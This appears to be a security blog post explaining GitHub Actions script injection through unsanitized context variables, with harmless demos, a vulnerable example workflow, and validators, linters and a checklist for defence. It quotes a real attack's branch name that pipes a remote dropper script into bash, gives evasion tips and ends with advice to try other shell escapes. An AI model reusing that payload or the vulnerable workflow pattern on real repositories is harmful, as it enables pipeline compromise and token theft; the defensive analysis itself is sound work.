Malware Insights: GitHub Actions Script Injection

It's time to talk about how DevOps and CI/CD pipelines work in general, and how the lack of sanitization of arbitrary input data turns common security practices into a false sense of security.

Attack Vector

GitHub Actions allows you to execute code inside an isolated sandbox, which means that it also allows the execution of arbitrary code (which is kind of the point behind it). The particular problem, however, is that GitHub / GitLab / etc. runners also allow variables in their templates, and the values of those variables end up in the shell that's executing an echo $variable command.

In each line of the GitHub Actions log there is a specific echo $variable command which prints out the inputs that are defined for each workflow. This also influences the UI, as the log output is parsed and then used to update the UI with the state changes found inside the log. This might also lead to a potential XSS vector in the GitHub frontend, but that is unused/unproven at this time.

The first incident of this new type of attack vector was disclosed as GHSA-7x29-qqmq-v6qc, but I'm trying to describe the underlying problem here and how more context variables can potentially be used for this type of infiltration.

# Executed inside the GitHub runner
echo "github.event_name: pull_request_target"
# ...
echo "first_input_name: ${first_input_name}"
echo "second_input_name: ${second_input_name}"
# ...

Arbitrary Unsanitized Inputs

This means, however, that every environment variable that's used inside an action.yml file can potentially be abused if its source contains arbitrary data that isn't filtered for special characters and escape characters.
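
To make the mechanism concrete, here is a minimal local simulation. It is not the runner's actual implementation: it only assumes that the untrusted value is pasted into the script text before a shell parses it. The render_step helper is hypothetical, and the payload is a harmless echo.

```shell
#!/bin/sh
# Hypothetical helper: mimics a template engine that pastes an untrusted
# value into the script text BEFORE any shell parses it.
render_step() {
  printf 'echo "head_ref: %s"' "$1"
}

# Harmless stand-in for an attacker-controlled branch name.
untrusted='feature-$(echo INJECTED)'

# The rendered script text now contains a live command substitution.
rendered=$(render_step "$untrusted")
printf 'rendered script: %s\n' "$rendered"

# Executing the rendered text runs the embedded command.
sh -c "$rendered"
```

The last command prints head_ref: feature-INJECTED, which shows that the embedded command ran instead of being treated as plain text.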

In the recent incident that hit the ultralytics/ultralytics repository, the attacker used the following name as the pull request's branch name to execute their malware dropper. To evade potential web application firewalls that block network traffic, the attacker omitted the https:// prefix, and hosted the malicious script code in a gist on GitHub to avoid detection.

The pull request's branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/username/hash_of_gist/dropper.sh}${IFS}|${IFS}bash)
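
Git ref names cannot contain spaces, which is presumably why the branch name separates its words with brace expansion and ${IFS} instead. The following harmless sketch shows both tricks in isolation. It assumes bash is the executing shell, and the function names are made up for illustration.

```shell
#!/bin/sh
# Both demos call bash explicitly, because brace expansion is a bash
# feature and is not available in every POSIX sh.

demo_brace_words() {
  # {echo,brace,expansion} expands to three words: echo brace expansion
  bash -c '{echo,brace,expansion}'
}

demo_ifs_separator() {
  # The unquoted ${IFS} expands to whitespace, which then splits the
  # single word into the command "echo" and its argument "hello".
  bash -c 'echo${IFS}hello'
}

demo_brace_words
demo_ifs_separator
```

Neither command line contains a literal space, yet both run echo with separate arguments.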

To reproduce it, you can also use different escaping techniques that get around a naive detection mechanism, similar to SQL injection. For example, ";;$(curl,...) or a command executed via a backslash or backticks might also work, as well as execution through a third-party command like perl, node or another REPL that supports execution via a CLI parameter.

In the first incident, however, the above git branch name led to the pull request action workflow being executed automatically, without any possibility to cancel it by design, and led to the malware being installed via the downloaded and executed dropper.sh file, which also had access to all other process environment variables, including the GITHUB_TOKEN, and to other lateral movement possibilities.

The dropper then patched the generated zip/wheel files of the published Python package for later runs, and inserted the crypto miner into those packages, but that's an unimportant detail in this context.

The problem is really that all environment variables and all variable inputs in CI/CD actions templates are potentially vulnerable to this, meaning that they either need extra sanitization/validation steps or have to be avoided at all costs.
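
One possible validation step is an allowlist that rejects anything outside a small character set, rather than a denylist that tries to enumerate dangerous characters. This is a minimal sketch: is_safe_ref is a hypothetical helper, and the accepted character set is an assumption that you would adapt to your own branch naming rules.

```shell
#!/bin/sh
# Hypothetical validator: accept only ASCII letters, digits, '.', '_', '/'
# and '-' (the ranges assume the C locale). Everything else, including '$',
# '(', '{', backticks, ';' and whitespace, is rejected, as is an empty value.
is_safe_ref() {
  case "$1" in
    '' | *[!A-Za-z0-9._/-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Usage sketch: validate before the value is used anywhere else.
candidate='feature/login-form'
if is_safe_ref "$candidate"; then
  printf 'accepted: %s\n' "$candidate"
else
  printf 'rejected: %s\n' "$candidate" >&2
fi
```

A branch name shaped like the one from the incident fails this check because it contains $, (, { and | characters.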

Potentially vulnerable pull request action context variables at this point:

  • github.ref
  • github.base_ref
  • github.head_ref
  • github.workflow
  • github.event.pull_request.title
  • github.event.pull_request.body
  • github.event.pull_request.base.label
  • github.event.pull_request.base.ref
  • github.event.pull_request.base.full_name
  • github.event.pull_request.base.name
  • github.event.pull_request.base.owner.login
  • github.event.pull_request.head.label
  • github.event.pull_request.head.ref
  • github.event.pull_request.head.full_name
  • github.event.pull_request.head.name
  • github.event.pull_request.head.owner.login

As you can see, a lot of metadata is passed down in the JSON data, and it comes from arbitrary sources. You should therefore be really cautious about what kind of metadata you include in your action.yml file.

Vulnerable Example

This vulnerable example is an action.yml style workflow file, typically located inside the repository's /.github/workflows folder, or in the equivalent CI configuration location on GitLab.

It demonstrates how both the attacker's repository full_name and git branch name can be used to execute shell code. The fact that the head_ref is wrapped inside an environment variable doesn't actually matter here, because the workflow reads it back through the ${{ env.GITHUB_REF }} template expression, so the raw value is still substituted unfiltered. This demonstrates the non-working mitigation that others have been wrongly recommending in the advisory.

Note that the actions/checkout plugin itself also runs a shell command behind the scenes, and also doesn't sanitize arguments that are passed to the executed shell commands later. It's running the git command via the private GitCommandManager.execGit method in case you want to audit it.

name: Publish Docs

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
  workflow_dispatch:
    inputs:
      publish_docs:
        description: "Publish something to https://example.com"
        default: "true"
        type: boolean

jobs:
  Docs:
    if: github.repository == 'example/repository'
    runs-on: ubuntu-latest
    env:
      GITHUB_REF: ${{ github.head_ref }}
    steps:
      - name: Git config
        run: |
          git config --global user.name "Example User"
          git config --global user.email "user@example.com"
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          repository: ${{ github.event.pull_request.head.repo.full_name }}
          token: ${{ secrets.GITHUB_TOKEN }}
          ref: ${{ env.GITHUB_REF }}
          fetch-depth: 0
      - name: Run something else
        run: echo "I was already pwned here"

Mitigation

The obvious mitigation is to check for unsanitized input variables and to not allow them in your repository's action.yml file. There are ongoing efforts to build validators that not only validate the schema of an action.yml file, but also check whether the variables inside the template can carry malformed values that lead to remote code execution.

The tool that I would recommend, even though it's still in development, is zizmor, as its author is very security conscious and uses a defensive programming style.

There might be some other tools available that are more stable, but as far as I know these only validate against the schema, not against vulnerabilities or weaknesses.
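
For a quick first pass without any dedicated tool, a crude text search can at least surface template expressions that reference attacker-influenced pull request metadata. This is only a sketch: find_risky_expressions is a hypothetical helper, its pattern covers just a handful of the context variables listed earlier, and every hit still needs manual review.

```shell
#!/bin/sh
# Hypothetical linter: print (with line numbers) every line of a workflow
# file that contains a template expression referencing attacker-influenced
# pull request metadata. The pattern is deliberately small and incomplete.
find_risky_expressions() {
  grep -nE '\$\{\{[^}]*github\.(head_ref|event\.pull_request\.(title|body|head\.(ref|label)))[^}]*\}\}' "$1"
}

# Usage sketch (the path is an assumption):
#   find_risky_expressions .github/workflows/docs.yml
```

The function exits with a non-zero status when nothing matches, so it can also serve as a simple gate in a review script.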

Security Checklist

As this type of problem recurs with every future change of the action.yml file, I would like to point out that this sort of weakness needs regular, ongoing audits and checks to prevent an infiltration of the build pipeline environment.

This is a supply chain attack with lateral movement capabilities, and it should be given the highest risk rating, as it's able to influence pretty much everything end-to-end with regard to how your software is compiled, built, updated, published and distributed.

It might be fixable with a pre-receive hook that's running on the server-side in case your organization uses a self-hosted GitHub Enterprise, GitLab, Gitea, or Gogs instance. But as of today there's no software available to check these sorts of issues before the potentially vulnerable blob, git branch name, git user name, git user email etc. lands on the git server.
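
As a rough idea of what such a hook could look like, the following sketch checks only the pushed ref names. Git passes a pre-receive hook one line per updated ref on stdin, in the form old-sha, new-sha, ref-name. The check_pushed_refs function and its character allowlist are assumptions, and blob contents, user names and user emails are not covered.

```shell
#!/bin/sh
# Sketch of a pre-receive style check. Each stdin line has the form:
#   <old-sha> <new-sha> <ref-name>
# Ref names with characters outside the allowlist are reported on stderr
# and make the function return a non-zero status.
check_pushed_refs() {
  rc=0
  while read -r old new ref; do
    case "$ref" in
      '' | *[!A-Za-z0-9._/-]*)
        printf 'rejected ref name: %s\n' "$ref" >&2
        rc=1
        ;;
    esac
  done
  return "$rc"
}

# In an actual hook script, the last line would be something like:
#   check_pushed_refs || exit 1
```

A non-zero exit status from a pre-receive hook makes the server refuse the push, so the suspicious ref never lands in the repository.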

Also keep in mind that as git refs and git blobs are hashed, this might make it harder for your Forensics team to check for this sort of attack vector, because evidence trails can be easily obfuscated with git gc and by similar means that remove or modify the blob filesystem behind git.

Everything that's already pushed and received by git is stored in its .git/objects/ folder and may potentially contain dropper scripts and malware, and currently there is no check in place to prevent this if your repository is public.

Depending on your CI/CD configuration and actions workflow templates, the attacker can then just access the malware from the git blobs via git show : or similar and may not even need to download any malware, as it would appear in the pull request as an already deleted change, or not at all if the diffing algorithm does not automatically rebase to the current pull request's HEAD.

On every change of your GitHub/GitLab Actions:

  • Don't run a Pull Request bot for untrusted members
  • Specifically allowlist trusted members for Pull Request workflow runs
  • Double-check all commits in reviews, run git gc on the pull request's HEAD to prevent abuse of hidden blobs
  • Use only the minimum amount of metadata you need for the actions workflow to complete
  • Check every environment variable for arbitrary sources
  • Check every GitHub/GitLab actions context variable for arbitrary sources
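
The allowlisting item from the checklist could be sketched as follows. The author names and the is_trusted_author helper are hypothetical; how the pull request author's login reaches the script depends on your CI system and is left open here.

```shell
#!/bin/sh
# Hypothetical allowlist of trusted pull request authors (space separated).
TRUSTED_AUTHORS='alice bob carol'

# Succeeds only if the given login exactly matches an allowlisted name.
is_trusted_author() {
  for name in $TRUSTED_AUTHORS; do
    [ "$name" = "$1" ] && return 0
  done
  return 1
}

# Usage sketch: refuse to continue for anyone who is not on the list.
if is_trusted_author 'mallory'; then
  echo 'running pull request checks'
else
  echo 'skipping: author is not allowlisted'
fi
```

An exact string comparison is used on purpose, so that a login that merely contains a trusted name does not pass.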

Personal Notes

As this attack vector is quite new and didn't happen a lot in the past as a supply chain attack, there's potentially a lot more to investigate.

As most alternatives to GitHub also include some form of CI/CD or actions automation, those software projects might also be affected. This means that there needs to be an audit for GitLab, Gitea, Gogs, and other alternatives to ensure that this type of arbitrary data input isn't executed inside a shell environment.

Technically, this sort of problem is a new weakness that has to be checked regularly by an organization's DevSecOps teams, as it recurs on every pull request and blob/tree change in git.

My personal recommendation would be to not execute a runner inside a shell environment, at all, but that's where the DevOps crowd would not agree with me as they sure do love their shell magic.

If I had the time, I would probably implement a runner based on yaegi or another typesafe interpreter instead of executing commands in a shell. But that is a huge amount of work to do end-to-end, and might therefore not be feasible for most companies on their own.

Pentesting Advice

As the described technique might not work in the future, I'd recommend trying out other shell escape techniques that either use preinstalled third-party REPLs to execute inlined scripts or that use different types of encodings to escape those restricted shell environments.

A good start is to read the following chapters of these books: